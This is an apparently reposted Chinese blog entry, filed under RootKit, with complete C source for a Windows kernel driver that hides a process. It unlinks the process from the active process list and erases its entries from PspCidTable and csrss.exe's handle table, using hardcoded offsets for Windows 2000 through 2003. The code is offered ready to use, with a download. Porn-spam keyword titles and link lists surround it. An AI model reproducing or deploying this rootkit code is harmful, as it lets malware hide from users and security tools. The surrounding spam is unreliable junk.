青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

科普之三招隱藏進程

Posted on 2009-10-30 00:10 S.l.e!ep.¢% 閱讀(467) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
【原創】科普之三招隱藏進程
cooldiyer 當前離線 添加 cooldiyer 的聲望 反映此帖
標 題: 【原創】科普之三招隱藏進程
作 者: cooldiyer
時 間: 2008-09-20,11:58
鏈 接: http://bbs.pediy.com/showthread.php?t=73129
先從活動進程鏈表中摘除?擦除PspCidTable中對應的Object?再擦除Csrss進程中那份表
擦除HandleTable表用了一些技巧,不用親自操作三層表,不是網上流傳的方法,具體請看代碼......

使用的時候直接HideProcessById(HIDE_PID)就行了
偶這只菜鳥的學習總結,牛們不要BS,我會超過你們的.很快

ProcessHide.h
代碼:
#ifndef?__PROCESSHIDE_H__
#define?__PROCESSHIDE_H__

#ifdef?__cplusplus
extern?"C"?{
#endif

#include?<ntddk.h>

/*
?使用之前請先調用InitializeCommonVariables初始化全局變量
*/

typedef?struct?_HANDLE_TABLE_ENTRY?{
??
????//
????//??The?pointer?to?the?object?overloaded?with?three?ob?attributes?bits?in
????//??the?lower?order?and?the?high?bit?to?denote?locked?or?unlocked?entries
????//
??
????union?{
????
????????PVOID?Object;
????
????????ULONG?ObAttributes;
????};
??
????//
????//??This?field?either?contains?the?granted?access?mask?for?the?handle?or?an
????//??ob?variation?that?also?stores?the?same?information.??Or?in?the?case?of
????//??a?free?entry?the?field?stores?the?index?for?the?next?free?entry?in?the
????//??free?list.??This?is?like?a?FAT?chain,?and?is?used?instead?of?pointers
????//??to?make?table?duplication?easier,?because?the?entries?can?just?be
????//??copied?without?needing?to?modify?pointers.
????//
??
????union?{
????
????????union?{
??????
????????????ACCESS_MASK?GrantedAccess;
??????
????????????struct?{
????????
????????????????USHORT?GrantedAccessIndex;
????????????????USHORT?CreatorBackTraceIndex;
????????????};
????????};
????
????????LONG?NextFreeTableEntry;
????};
??
}?HANDLE_TABLE_ENTRY,?*PHANDLE_TABLE_ENTRY;

typedef?struct?_HANDLE_TABLE?{
??
????//
????//??A?set?of?flags?used?to?denote?the?state?or?attributes?of?this
????//??particular?handle?table
????//
??
????ULONG?Flags;
??
????//
????//??The?number?of?handle?table?entries?in?use.
????//
??
????LONG?HandleCount;
??
????//
????//??A?pointer?to?the?top?level?handle?table?tree?node.
????//
??
????PHANDLE_TABLE_ENTRY?**Table;
??
????//
????//??The?process?who?is?being?charged?quota?for?this?handle?table?and?a
????//??unique?process?id?to?use?in?our?callbacks
????//
??
????struct?_EPROCESS?*QuotaProcess;
????HANDLE?UniqueProcessId;
??
????//
????//??This?is?a?singly?linked?list?of?free?table?entries.??We?don't?actually
????//??use?pointers,?but?have?each?store?the?index?of?the?next?free?entry
????//??in?the?list.??The?list?is?managed?as?a?lifo?list.??We?also?keep?track
????//??of?the?next?index?that?we?have?to?allocate?pool?to?hold.
????//
??
????LONG?FirstFreeTableEntry;
????LONG?NextIndexNeedingPool;
??
????//
????//??This?is?the?lock?used?to?protect?the?fields?in?the?record,?and?the
????//??handle?table?tree?in?general.??Individual?handle?table?entries?that?are
????//??not?free?have?their?own?lock
????//
??
????ERESOURCE?HandleTableLock;
??
????//
????//??The?list?of?global?handle?tables.??This?field?is?protected?by?a?global
????//??lock.
????//
??
????LIST_ENTRY?HandleTableList;
??
????//
????//??The?following?field?is?used?to?loosely?synchronize?thread?contention
????//??on?a?handle.??If?a?thread?wants?to?wait?for?a?handle?to?be?unlocked
????//??it?will?wait?on?this?event?with?a?short?timeout.??Any?handle?unlock
????//??operation?will?pulse?this?event?if?there?are?threads?waiting?on?it
????//
??
????KEVENT?HandleContentionEvent;
}?HANDLE_TABLE,?*PHANDLE_TABLE;??

typedef?BOOLEAN?(*EX_ENUMERATE_HANDLE_ROUTINE)(
??IN?PHANDLE_TABLE_ENTRY?HandleTableEntry,
??IN?HANDLE?Handle,
??IN?PVOID?EnumParameter
??);

typedef?BOOLEAN?(*__ExEnumHandleTable)(
??IN?PHANDLE_TABLE?HandleTable,
??IN?EX_ENUMERATE_HANDLE_ROUTINE?EnumHandleProcedure,
??IN?PVOID?EnumParameter,
??OUT?PHANDLE?Handle?OPTIONAL
??);

NTSTATUS
GetPspCidTable(
??OUT?PHANDLE_TABLE*?ppPspCidTable
??);

BOOLEAN
EnumHandleCallback(
??IN?PHANDLE_TABLE_ENTRY?HandleTableEntry,
??IN?HANDLE?Handle,
??IN?OUT?PVOID?EnumParameter
??);

NTSTATUS
EraseObjectFromHandleTable(
??PHANDLE_TABLE?pHandleTable,
??IN?HANDLE?ProcessId
??);

NTSTATUS
RemoveNodeFromActiveProcessLinks(
??IN?HANDLE?ProcessId
??);

NTSTATUS
HideProcessById(
??IN?HANDLE?ProcessId
??);

NTSTATUS
InitializeCommonVariables(
??);

NTSTATUS
GetProcessNameOffset(
??OUT?PULONG??Offset?OPTIONAL
??);

NTSTATUS
LookupProcessByName(
??IN?PCHAR?pcProcessName,
??OUT?PEPROCESS?*Process
??);
#ifdef?__cplusplus
}?//?extern?"C"
#endif

#endif?//?__PROCESSHIDE_H__
ProcessHide.c
代碼:
#include?"ProcessHide.h"
#include?"LDasm.h"

ULONG????g_Offset_Eprocess_Name?=?NULL;
ULONG????g_Offset_Eprocess_Flink?=?NULL;
ULONG????g_Offset_Eprocess_ProcessId?=?NULL;
ULONG????g_Offset_Eprocess_HandleTable?=?NULL;

PEPROCESS??g_pEprocess_System?=?NULL;


NTSTATUS
GetPspCidTable(
??OUT?PHANDLE_TABLE*?ppPspCidTable
??)
??/*
??通過搜索PsLookupProcessByProcessId函數,獲取PspCidTable的地址
??*/
{
??NTSTATUS????status;
??PUCHAR??????cPtr;
??unsigned?char?*?pOpcode;
??ULONG??????Length;
??UNICODE_STRING??uniPsLookup;
??ULONG??????PsLookupProcessByProcessId;

??status?=?STATUS_NOT_FOUND;

??RtlInitUnicodeString(&uniPsLookup,?L"PsLookupProcessByProcessId");?
??PsLookupProcessByProcessId?=?MmGetSystemRoutineAddress(&uniPsLookup);?//MmGetSystemRoutineAddress可以通過函數名獲得函數地址

??for?(cPtr?=?(PUCHAR)PsLookupProcessByProcessId;
????cPtr?<?(PUCHAR)PsLookupProcessByProcessId?+?PAGE_SIZE;
????cPtr?+=?Length)
??{
????Length?=?SizeOfCode(cPtr,?&pOpcode);????//credit?to?LDasm.c?by?Ms-Rem
????if?(!Length)?break;
????if?(*(PUSHORT)cPtr?==?0x35FF?&&?*(pOpcode?+?6)?==?0xE8)
????{
??????*ppPspCidTable?=?**(PVOID?**)(pOpcode?+?2);
??????status?=?STATUS_SUCCESS;
??????break;
????}
??}
??return?status;
}

BOOLEAN
EnumHandleCallback(
??IN?PHANDLE_TABLE_ENTRY?HandleTableEntry,
??IN?HANDLE?Handle,
??IN?OUT?PVOID?EnumParameter
??)
{
??if?(ARGUMENT_PRESENT(EnumParameter)?&&?*(HANDLE?*)EnumParameter?==?Handle)
??{
????*(PHANDLE_TABLE_ENTRY?*)EnumParameter?=?HandleTableEntry;
????return?TRUE;
??}
??return?FALSE;
}

//?修改一下,可以傳遞要擦除的ID做參數
NTSTATUS
EraseObjectFromHandleTable(
??PHANDLE_TABLE?pHandleTable,
??IN?HANDLE?ProcessId
??)
{
??NTSTATUS????status;
????
??PVOID??????EnumParameter;
??UNICODE_STRING??uniExEnumHandleTable;

??__ExEnumHandleTable??ExEnumHandleTable;

??status?=?STATUS_NOT_FOUND;
??EnumParameter?=?ProcessId;


??RtlInitUnicodeString(&uniExEnumHandleTable,?L"ExEnumHandleTable");
??ExEnumHandleTable?=?MmGetSystemRoutineAddress(&uniExEnumHandleTable);

??if?(NULL?==?ExEnumHandleTable)
??{
????return?STATUS_NOT_FOUND;
??}

??//?Enum后可以擦除,Callback過程中不能擦除
??if?(ExEnumHandleTable(pHandleTable,?EnumHandleCallback,?&EnumParameter,?NULL))
??{
????InterlockedExchangePointer(&((PHANDLE_TABLE_ENTRY)EnumParameter)->Object,?NULL);
????status?=?STATUS_SUCCESS;
??}

??return?status;
}

NTSTATUS
RemoveNodeFromActiveProcessLinks(
??IN?HANDLE?ProcessId
??)
{
??NTSTATUS??status;
??PLIST_ENTRY??pListEntry;
??PEPROCESS??pEprocess;

??status?=?PsLookupProcessByProcessId(ProcessId,?&pEprocess);

??if?(!NT_SUCCESS(status))
??{
????return?status;
??}
??ObDereferenceObject(pEprocess);

??pListEntry?=?(ULONG)pEprocess?+?g_Offset_Eprocess_Flink;

??//?從鏈表中摘除
??pListEntry->Blink->Flink?=?pListEntry->Flink;
??pListEntry->Flink->Blink?=?pListEntry->Blink;

??return?status;
}


NTSTATUS
HideProcessById(
??IN?HANDLE?ProcessId
??)
{
??NTSTATUS????status;
??PHANDLE_TABLE??pPspCidTable;
??PEPROCESS????pCsrssEprocess?=?NULL;


??if?(NULL?==?g_Offset_Eprocess_HandleTable)
??{
????status?=?InitializeCommonVariables();
????if?(!NT_SUCCESS(status))
????{
??????return?status;
????}
??}

??status?=?GetPspCidTable(&pPspCidTable);

??if?(!NT_SUCCESS(status))
??{
????return?status;
??}

??status?=?LookupProcessByName("CSRSS.EXE\0",?&pCsrssEprocess);

??if?(!NT_SUCCESS(status))
??{
????return?status;
??}

??//?先從活動進程鏈表中摘除
??status?=?RemoveNodeFromActiveProcessLinks(ProcessId);


??//?擦除PspCidTable中對應的Object
??status?=?EraseObjectFromHandleTable(pPspCidTable,?ProcessId);


??//?擦除Csrss進程中那份表
??status?=?EraseObjectFromHandleTable(*(PULONG)((ULONG)pCsrssEprocess?+?g_Offset_Eprocess_HandleTable),?ProcessId);


??return?status;
}

NTSTATUS
LookupProcessByName(
??IN?PCHAR?pcProcessName,
??OUT?PEPROCESS?*pEprocess
??)
{?
??NTSTATUS??status;
??ULONG????uCurrentProcessId?=?0;
??ULONG????uStartProcessId?=?0;?
??ULONG????uCount?=?0;
??ULONG????uLength?=?0;
??PLIST_ENTRY??pListActiveProcess;
??PEPROCESS??pCurrentEprocess?=?NULL;

??
??if?(!ARGUMENT_PRESENT(pcProcessName)?||?!ARGUMENT_PRESENT(pEprocess))
??{
????return?STATUS_INVALID_PARAMETER;
??}

??uLength?=?strlen(pcProcessName);

??pCurrentEprocess?=?g_pEprocess_System;

??uStartProcessId?=?*((PULONG)((ULONG)pCurrentEprocess?+?g_Offset_Eprocess_ProcessId));

??uCurrentProcessId?=?uStartProcessId;

??while(1)
??{
????if(_strnicmp(pcProcessName,?(PVOID)((ULONG)pCurrentEprocess?+?g_Offset_Eprocess_Name),?uLength)?==?0)
????{
??????*pEprocess?=?pCurrentEprocess;
??????status?=?STATUS_SUCCESS;
??????break;
????}
????else?if?((uCount?>=?1)?&&?(uStartProcessId?==?uCurrentProcessId))
????{
??????*pEprocess?=?0x00000000;
??????status?=?STATUS_NOT_FOUND;
??????break;
????}
????else?
????{
??????pListActiveProcess?=?(LIST_ENTRY?*)((ULONG)pCurrentEprocess?+?g_Offset_Eprocess_Flink);
??????(ULONG)pCurrentEprocess?=?(ULONG)pListActiveProcess->Flink;
??????(ULONG)pCurrentEprocess?=?(ULONG)pCurrentEprocess?-?g_Offset_Eprocess_Flink;
??????uCurrentProcessId?=?*(PULONG)((ULONG)pCurrentEprocess?+?g_Offset_Eprocess_ProcessId);
??????uCount++;
????}
??}
??return?status;
}

NTSTATUS
GetProcessNameOffset(
??OUT?PULONG??Offset?OPTIONAL
??)
???????????/*
???????????在DriverEntry中調用
???????????*/
{
??NTSTATUS??status;
??PEPROCESS??curproc;
??ULONG??????i;

??if?(!MmIsAddressValid((PVOID)Offset))
??{
????status?=?STATUS_INVALID_PARAMETER;
????return?status;
??}

??curproc?=?PsGetCurrentProcess();

??//
??//?然后搜索KPEB,得到ProcessName相對KPEB的偏移量
??//?偏移174h的位置,這里存的是進程的短文件名,少數地方用,
??//?比如SoftIce的addr和proc命令,如果名稱超過16個字符直接截斷

??//?Scan?for?12KB,?hopping?the?KPEB?never?grows?that?big!
??//
??for(?i?=?0;?i?<?3?*?PAGE_SIZE;?i++?)?{

????if(!strncmp(?"System",?(PCHAR)?curproc?+?i,?strlen("System")))?{
??????*Offset?=?i;
??????status?=?STATUS_SUCCESS;
??????break;
????}
??}
??return?status;
}

NTSTATUS
InitializeCommonVariables(
??)
{
??NTSTATUS??status;
??ULONG??uMajorVersion;
??ULONG??uMinorVersion;

??status?=?GetProcessNameOffset(&g_Offset_Eprocess_Name);

??if?(!NT_SUCCESS(status))
??{
????return?status;
??}

??g_pEprocess_System?=?PsGetCurrentProcess();

??PsGetVersion(&uMajorVersion,?&uMinorVersion,?NULL,?NULL);

??if?(uMajorVersion?==?4?&&?uMinorVersion?==?0)
??{
????g_Offset_Eprocess_Flink?=?152;
????//?Stop?supporting?NT?4.0
????return?STATUS_UNSUCCESSFUL;
??}
??else?if?(uMajorVersion?==?5?&&?uMinorVersion?==?0)
??{
????g_Offset_Eprocess_ProcessId?=?156;
????g_Offset_Eprocess_Flink?=?160;
????g_Offset_Eprocess_HandleTable?=?0x128;
??}
??else?if?(uMajorVersion?==?5?&&?uMinorVersion?==?1)
??{
????g_Offset_Eprocess_ProcessId?=?132;
????g_Offset_Eprocess_Flink?=?136;
????g_Offset_Eprocess_HandleTable?=?0xC4;
??}
??else?if?(uMajorVersion?==?5?&&?uMinorVersion?==?2)
??{
????g_Offset_Eprocess_ProcessId?=?132;
????g_Offset_Eprocess_Flink?=?136;
????g_Offset_Eprocess_HandleTable?=?0xC4;
??}

??return?STATUS_SUCCESS;
}

上傳的附件
文件類型: rar ProcessHide.rar (6.1 KB, 465 次下載) [誰下載?]
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

    • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>

    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>

            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            
99riav国产精品|
欧美一激情一区二区三区|
国产一区二区三区直播精品电影|
国模精品一区二区三区色天香|
99精品国产热久久91蜜凸|
久久久噜噜噜久久|
亚洲尤物在线|
欧美日韩一区二区三区免费看|
午夜激情综合网|
国产视频在线一区二区|
久久女同互慰一区二区三区|
欧美淫片网站|
欧美激情乱人伦|
亚洲天堂av高清|
欧美视频在线一区|
亚洲影院在线|
亚洲国产福利在线|
久久精品噜噜噜成人av农村|
亚洲一区二区黄|
在线国产日韩|
亚洲欧美日韩在线不卡|
亚洲盗摄视频|
亚洲午夜精品在线|
国产一区二区三区久久久久久久久|
亚洲精品久久久久久久久|
亚洲三级免费观看|
欧美午夜不卡在线观看免费
|
欧美日韩精品三区|
午夜视频精品|
中日韩在线视频|
国产亚洲欧美中文|
亚洲欧美成人网|
…久久精品99久久香蕉国产|
欧美国产日韩一区二区在线观看|
欧美伊人久久|
亚洲永久免费精品|
亚洲免费婷婷|
一区二区三区在线免费观看|
久久精品在线免费观看|
日韩一级黄色大片|
亚洲精品乱码久久久久久|
欧美性猛片xxxx免费看久爱|
久久久久国产成人精品亚洲午夜|
女同性一区二区三区人了人一|
亚洲欧洲综合另类|
国产欧美日韩视频|
免费亚洲网站|
午夜欧美精品|
中国女人久久久|
国产欧美日韩一区二区三区在线观看|
久久久久一区二区|
欧美日本精品|
欧美国产精品日韩|
亚洲精品系列|
国产精品永久入口久久久|
欧美一区二区精美|
亚洲免费观看在线观看|
久久久久久久网|
妖精视频成人观看www|
免费在线成人av|
日韩系列欧美系列|
狠久久av成人天堂|
最新日韩中文字幕|
欧美一区二区在线免费播放|
亚洲二区视频在线|
国产日韩欧美综合|
亚洲国内在线|
在线视频欧美日韩|
一区二区三区**美女毛片|
一区二区91|
国产精品男女猛烈高潮激情
|
韩国一区二区三区美女美女秀|
久久婷婷麻豆|
欧美视频在线播放|
久久在线免费观看视频|
欧美日本在线视频|
久久综合狠狠综合久久综合88|
欧美日本亚洲韩国国产|
免费观看亚洲视频大全|
国产伦精品一区二区三区高清版|
欧美成人视屏|
狠狠色丁香婷综合久久|
中文一区二区|
日韩亚洲欧美成人一区|
麻豆久久婷婷|
亚洲剧情一区二区|
欧美成人午夜免费视在线看片|
免费成人网www|
国产精品实拍|
亚洲精品免费在线播放|
国产一区二区三区在线免费观看
|
久久亚洲春色中文字幕|
欧美日韩少妇|
亚洲免费电影在线|
亚洲精品免费在线|
蜜桃伊人久久|
蜜乳av另类精品一区二区|
国产日韩1区|
亚洲欧美bt|
亚洲字幕一区二区|
欧美日韩在线精品|
99精品热视频|
亚洲在线免费|
国产精品成人免费|
亚洲私人黄色宅男|
亚洲欧美日韩国产一区|
欧美午夜大胆人体|
久久精视频免费在线久久完整在线看|
av成人免费在线|
日韩天堂在线观看|
欧美久久久久久久|
亚洲剧情一区二区|
亚洲私人黄色宅男|
久久一综合视频|
亚洲高清在线播放|
亚洲国产日韩欧美在线99|
亚洲国产乱码最新视频|
亚洲美女性视频|
欧美日韩在线综合|
中文精品99久久国产香蕉|
亚洲欧美综合精品久久成人|
另类图片国产|
伊人久久亚洲美女图片|
久久免费视频一区|
亚洲福利视频三区|
亚洲一区二区三区影院|
国产日韩精品在线观看|
久久精品视频免费|
亚洲国内高清视频|
亚洲欧美资源在线|
一区二区在线观看视频在线观看|
久久色在线播放|
亚洲精品网址在线观看|
午夜久久影院|
亚洲国产精品va在看黑人|
欧美乱大交xxxxx|
欧美一级日韩一级|
亚洲欧洲三级|
久久精品综合网|
夜夜爽www精品|
国产午夜亚洲精品不卡|
亚洲一级黄色|
亚洲国产精品成人va在线观看|
亚洲一区二区三区四区在线观看
|
一本到12不卡视频在线dvd|
国产精品你懂的在线欣赏|
久久久亚洲影院你懂的|
91久久久在线|
两个人的视频www国产精品|
中国成人黄色视屏|
欧美日本韩国一区|
久久美女性网|
亚洲一区二区在线视频|
亚洲国产精品va在线看黑人动漫|
欧美一区二区三区在|
亚洲每日更新|
在线观看日韩av电影|
久久99在线观看|
亚洲精品中文字幕在线|
国产一区导航|
欧美日韩一区二区在线观看视频|
久久久精品一区|
99re66热这里只有精品3直播
|
一区在线免费观看|
欧美日韩精品一区视频|
亚洲肉体裸体xxxx137|
欧美在线一二三四区|
亚洲日本免费|
国内精品久久久久影院优|
欧美日韩在线视频观看|
久久蜜桃精品|
午夜精品福利一区二区三区av
|
欧美成年人网站|
99一区二区|
欧美成人一区二免费视频软件|
亚洲视频在线观看免费|
99亚洲伊人久久精品影院红桃|
美女成人午夜|
久热国产精品|
久久亚洲精品中文字幕冲田杏梨|
中文精品在线|
亚洲一区www|
亚洲精品美女|
日韩视频中午一区|
国产午夜精品久久久|
国产日本欧美在线观看|
欧美日韩在线播放|
国产亚洲欧洲997久久综合|
国产精品久久毛片a|
亚洲精品免费一区二区三区|
亚洲国内精品|
欧美精品一区二区三区蜜桃|
午夜亚洲性色视频|
国产精品igao视频网网址不卡日韩|
久久精品国产99国产精品澳门|
欧美好吊妞视频|
欧美在线播放|
亚洲午夜影视影院在线观看|
久久视频免费观看|
欧美成人影音|